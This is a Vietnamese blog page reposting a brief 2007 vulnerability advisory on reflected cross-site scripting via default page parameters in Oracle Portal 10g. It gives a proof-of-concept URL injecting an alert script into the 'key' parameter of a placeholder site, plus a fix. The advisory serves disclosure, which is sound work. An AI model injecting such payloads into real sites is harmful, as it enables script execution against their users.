Guru's Blog
share with you :)
Navigation for Guru's Blog - XSS with default page parameter in Oracle Portal 10g
Content
Sidebar
Footer
Download nhạc từ các trang nhạc lớn của Việt Nam
« Linh nhạc vnmusic.com.vn
|
Trang chủ
|
Đại hội hacker mũ trắng »
02 Tháng Giêng 2007
@ 08:21
Ý kiến [0]
XSS with default page parameter in Oracle Portal 10g
(
Tác giả:
Phạm Đức Hải
)
http://www.securityfocus.com/archive/1/455486
http://www.securityfocus.com/bid/21812/
XSS with default page parameter in Oracle Portal 10g
Discovered By: Phạm Đức Hải (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com
-------------------------
Description:
When programmers code with Oracle Portal, they may use page parameters supported by Oracle Portal.
By default, these parameters have the xss bug. If the programmers don't filter or process these parameters before using,
the attacker maybe exploit via this xss bug.
Exploit : (tested Oracle Portal 10g 10.0.0.x)
For example, we have site : http://somesite.com used Oracle Portal 10g and this site is using key - page parameter(by default).
...key="><script>alert('xss_bug_found');</script>
http://somesite.com/portal/page?_pageid=<pageid>&_dad=portal&_schema=<sc
hema>&key="><script>alert('xss_bug_found');</script>
Solution:
Filter or process all the page parameters.
Gửi tặng
||
Bloglines
||
del.icio.us
||
Technorati
||
Digg it!
« Linh nhạc vnmusic.com.vn
|
Trang chủ
|
Đại hội hacker mũ trắng »
Chuyên mục:
Bảo mật
Bài viết liên quan:
Nội dung hội thảo "Ngày an toàn thông tin 26/11/2008"
hackthissite.org (HTS) : web bacsic missions walk through (1-10)
MS Server Service Could Allow Remote Code Execution
LlyKil - người đã DDoS bkav.com.vn
DDoS bằng DDoS FlashX (2)
DDoS bằng DDoS FlashX
Referred by:
Google Hack a Oracle (www.google.com.vn)
[Referral]
parameter (www.google.com.vn)
[Referral]
tìm kiếm tron oracle portal (www.google.com.vn)
[Referral]
oracle portal (xalo.vn)
[Referral]
video oracle portal (www.google.com.vn)
[Referral]
xss website (www.google.com.vn)
[Referral]
Oracle portal (www.google.com.vn)
[Referral]
portal oracle (www.google.com.vn)
[Referral]
"Oracle Portal" (www.google.com.vn)
[Referral]
oracle portal forum page (www.google.com.vn)
[Referral]
Oracle AS 10g Portal Demo (www.google.com.vn)
[Referral]
hack XSS (www.google.com.vn)
[Referral]
Hack Oracle (www.google.com.vn)
[Referral]
oracle portal (www.google.com.vn)
[Referral]
oracle portal (www.google.com.vn)
[Referral]
#parameter# +oracle portal (www.google.com.vn)
[Referral]
Server Default page (www.google.com.vn)
[Referral]
pageid, page parameter oracle portal (www.google.com.vn)
[Referral]
oracleportal (www.google.com.vn)
[Referral]
xss demo video (www.google.com.vn)
[Referral]
Họ tên
E-mail
(sẽ hiển thị
gravatar
theo email của bạn)
Trang chủ
Ghi nhớ
Bộ gõ
Tắt
TELEX
VNI
Ý kiến (Không dùng HTML)
Nhập mã kiểm tra :(chống xì-pum ý mà):
Tác giả
Tìm kiếm
Bài viết mới nhất
Một công cụ kiểm tra Rootkit made in VietNam
Nội dung hội thảo "Ngày an toàn thông tin 26/11/2008"
hackthissite.org (HTS) : web bacsic missions walk through (1-10)
MS Server Service Could Allow Remote Code Execution
LlyKil - người đã DDoS bkav.com.vn
DDoS bằng DDoS FlashX (2)
DDoS bằng DDoS FlashX
Bot & Botnet (phần 4)
Bot & Botnet (phần 3)
Bot & Botnet (phần 2)
Bot & Botnet (phần 1)
Web vulnerabilities to gain access to the system
What Does a System Administrator Do?
Vụ DDoS BKIS nhìn nhận từ góc độ hệ thống
Local by pass server windows with kshell ?
Lưu trữ
Lưu trữ theo ngày
Lưu trữ chuyên mục
Chuyên mục
.NET (21)
Blog (7)
CSharp (14)
Ajax (10)
Âm nhạc (42)
Lời bài hát (16)
Audio Book (1)
Bài viết hay (2)
Bạn bè - Người thân (11)
Bảo mật (66)
Data Mining (1)
Giải trí (46)
Google (8)
Hack (73)
Iphone (4)
Java (4)
Laptop (1)
Linh tinh (10)
Linux (34)
Ubuntu (11)
Mã nguồn mở (2)
MySql (2)
Networking (15)
Oracle (4)
Phim ảnh (2)
Photos (2)
PHP (8)
Regex (7)
Reverse engineering (1)
rootkit (1)
SQL Server 2000 (2)
sysadmin (1)
Tản mạn (15)
Technology (1)
Thơ (6)
Vi Thùy Linh (4)
Xuân Quỳnh (2)
Unicode (1)
Việt hóa (3)
Virus (4)
VoIP (5)
war game (9)
Website (38)
Windows (7)
XHTML & CSS (2)
Y!mash (2)
Liên kết
Trang chủ
Demo lọc nội dung
Guru Mail
Media Downloader
Bói tình củm
Sơn la Online
My Google Page
Mã hóa
Ngôn ngữ
svtunhien.net
Lưu trữ theo tháng
Tháng Giêng, 2009 (1)
Tháng Mười Một, 2008 (1)
Tháng Mười, 2008 (14)
Tháng Tám, 2008 (2)
Tháng Bảy, 2008 (5)
Tháng Sáu, 2008 (9)
Tháng Năm, 2008 (5)
Tháng Tư, 2008 (1)
Tháng Ba, 2008 (8)
Tháng Hai, 2008 (2)
Tháng Giêng, 2008 (2)
Tháng Mười Hai, 2007 (4)
Tháng Mười Một, 2007 (6)
Tháng Mười, 2007 (4)
Tháng Chín, 2007 (2)
Tháng Tám, 2007 (15)
Tháng Bảy, 2007 (16)
Tháng Sáu, 2007 (30)
Tháng Năm, 2007 (1)
Tháng Ba, 2007 (3)
Tháng Hai, 2007 (4)
Tháng Giêng, 2007 (15)
Tháng Mười Hai, 2006 (21)
Tháng Mười Một, 2006 (30)
Tháng Mười, 2006 (38)
Tháng Chín, 2006 (3)
Tháng Tám, 2006 (1)
Tháng Bảy, 2006 (7)
Tháng Sáu, 2006 (23)
Tháng Năm, 2006 (18)
Tháng Tư, 2006 (16)
Tháng Ba, 2006 (25)
Bạn bè
Bachmahoangtu
Cao Sơn
Chip 2.0
Đặng Quốc Khánh
haian82
Kiên XD
Long (lngt)
Scott Hanselman
Sue's little edream
zatuzik
Chuyên mục
.NET
Blog
CSharp
Ajax
Âm nhạc
Lời bài hát
Audio Book
Bài viết hay
Bạn bè - Người thân
Bảo mật
Data Mining
Giải trí
Google
Hack
Iphone
Java
Laptop
Linh tinh
Linux
Ubuntu
Mã nguồn mở
MySql
Networking
Oracle
Phim ảnh
Photos
PHP
Regex
Reverse engineering
rootkit
SQL Server 2000
sysadmin
Tản mạn
Technology
Thơ
Vi Thùy Linh
Xuân Quỳnh
Unicode
Việt hóa
Virus
VoIP
war game
Website
Windows
XHTML & CSS
Y!mash
Thống kê
Admin Guru
Đăng nhập
Link hay